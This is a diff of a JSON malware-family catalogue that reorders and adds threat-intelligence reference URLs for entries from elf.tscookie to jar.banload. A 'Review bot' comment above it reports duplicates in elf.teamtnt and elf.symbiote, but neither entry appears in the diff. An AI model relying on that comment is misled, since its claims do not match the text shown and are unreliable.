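Review bot: The new refs list for elf.teamtnt carries `https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt` twice — once as the unchanged first element and again in the added line `+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",` — so anything that indexes or counts references for this entry sees a duplicate; dropping that added line fixes it. The neighbouring hunks reshuffle refs without changing their content, which suggests the export step is not sorting or de-duplicating the list before writing it out; normalizing to a sorted, URL-unique list would keep such duplicates out and make future updates reviewable as real changes rather than reorderings. The same normalization would also catch the pre-existing trailing-slash pair in elf.symbiote's refs earlier in this diff. The JSON object for this entry starts and ends outside the hunk.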
@@ -6821,18 +7130,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie",
- "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
 "https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf",
+ "https://twitter.com/ESETresearch/status/1382054011264700416",
 "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
 "https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf",
- "https://twitter.com/ESETresearch/status/1382054011264700416",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
+ "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html"
 ],
 "synonyms": [],
 "type": []
@@ -6858,28 +7167,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
+ "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
+ "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
+ "http://get.cyberx-labs.com/radiation-report",
 "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://asec.ahnlab.com/en/54647/",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
 "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
- "https://blog.aquasec.com/fileless-malware-container-security",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
 "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
- "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
- "https://sysdig.com/blog/muhstik-malware-botnet-analysis/",
- "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "http://get.cyberx-labs.com/radiation-report",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
 "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
- "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134",
+ "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
 "https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/",
- "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/"
+ "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/",
+ "https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt",
+ "https://blog.aquasec.com/fileless-malware-container-security",
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/"
 ],
 "synonyms": [
 "Amnesia",
@@ -6896,7 +7206,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat",
- "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html"
+ "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html",
+ "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html"
 ],
 "synonyms": [],
 "type": []
@@ -6951,8 +7262,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_005",
- "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/",
- "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/"
+ "https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/",
+ "https://ti.qianxin.com/blog/articles/SideCopy's-Golang-based-Linux-tool/"
 ],
 "synonyms": [],
 "type": []
@@ -6992,9 +7303,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike",
+ "https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html",
 "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/",
- "https://notes.netbytesec.com/2021/09/discovering-linux-elf-beacon-of-cobalt_18.html"
+ "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
 ],
 "synonyms": [],
 "type": []
@@ -7007,31 +7318,31 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter",
- "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html",
- "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
- "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
- "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
- "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
- "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html",
 "https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
- "https://blog.talosintelligence.com/2018/05/VPNFilter.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf",
+ "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html",
 "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
+ "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
+ "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
+ "https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf",
+ "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/",
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
+ "https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
+ "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
 "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/",
 "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter",
- "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf",
+ "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-054a",
 "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/"
+ "https://blog.talosintelligence.com/2018/05/VPNFilter.html"
 ],
 "synonyms": [],
 "type": []
@@ -7057,14 +7368,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html"
 ],
 "synonyms": [],
 "type": []
@@ -7077,24 +7388,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
 "https://community.riskiq.com/article/541a465f/description",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
 "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
 "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
- "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html"
 ],
 "synonyms": [],
 "type": []
@@ -7102,13 +7413,26 @@
 "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de",
 "value": "elf.wellmess"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whirlpool",
+ "https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "be3a5211-45a8-496a-974f-6ef14f44af3d",
+ "value": "WHIRLPOOL"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.whiterabbit",
- "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET"
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Ransom.Win32.WHITERABBIT.YACAET",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
 ],
 "synonyms": [],
 "type": []
@@ -7121,11 +7445,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
 "https://attack.mitre.org/groups/G0096",
- "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
 "https://blog.exatrack.com/melofee/",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
+ "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "https://asec.ahnlab.com/en/55785/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
 ],
 "synonyms": [],
 "type": []
@@ -7138,8 +7464,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet",
- "https://news.drweb.com/show/?i=2679&lng=en&c=14",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html"
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
+ "https://news.drweb.com/show/?i=2679&lng=en&c=14"
 ],
 "synonyms": [],
 "type": []
@@ -7152,14 +7478,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/",
 "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf",
 "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/",
 "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight"
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
 ],
 "synonyms": [
 "chopstick",
@@ -7177,8 +7503,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe",
 "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html"
+ "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
 ],
 "synonyms": [],
 "type": []
@@ -7204,8 +7530,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/",
- "https://unit42.paloaltonetworks.com/atoms/agedlibra/"
+ "https://unit42.paloaltonetworks.com/atoms/agedlibra/",
+ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
 ],
 "synonyms": [],
 "type": []
@@ -7231,23 +7557,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
- "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/",
- "https://en.wikipedia.org/wiki/Xor_DDoS",
- "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
- "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf",
- "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
- "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/",
- "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
- "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",
- "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
+ "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
+ "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
+ "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
+ "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/",
+ "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf",
+ "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
 "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
+ "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
+ "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
+ "https://en.wikipedia.org/wiki/Xor_DDoS"
 ],
 "synonyms": [
 "XORDDOS"
@@ -7305,7 +7631,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zuo_rat",
- "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/"
+ "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/",
+ "https://www.mandiant.com/resources/blog/chinese-espionage-tactics"
 ],
 "synonyms": [],
 "type": []
@@ -7318,8 +7645,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad",
- "https://github.com/Hopfengetraenk/Fas-Disasm",
- "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft"
+ "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft",
+ "https://github.com/Hopfengetraenk/Fas-Disasm"
 ],
 "synonyms": [
 "Acad.Bursted",
@@ -7361,9 +7688,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
 ],
 "synonyms": [],
 "type": []
@@ -7416,6 +7743,19 @@
 "uuid": "25bff9ad-20dc-4746-a174-e54fcdd8f0c1",
 "value": "Postlo"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.triangledb",
+ "https://securelist.com/triangledb-triangulation-implant/110050/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "25754894-018b-4bed-aab6-c676fac23a77",
+ "value": "TriangleDB"
+ },
 {
 "description": "The iOS malware that is installed over USB by osx.wirelurker",
 "meta": {
@@ -7448,21 +7788,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
- "https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
+ "http://malware-traffic-analysis.net/2017/07/04/index.html",
 "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat",
- "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
+ "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html",
+ "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885",
+ "https://citizenlab.ca/2015/12/packrat-report/",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat",
 "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
- "https://citizenlab.ca/2015/12/packrat-report/",
- "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
- "http://malware-traffic-analysis.net/2017/07/04/index.html",
- "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/",
+ "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885" + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/" ], "synonyms": [ "AlienSpy", @@ -7495,10 +7835,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", - "https://colin.guru/index.php?title=Advanced_Banload_Analysis", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload", - "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", + 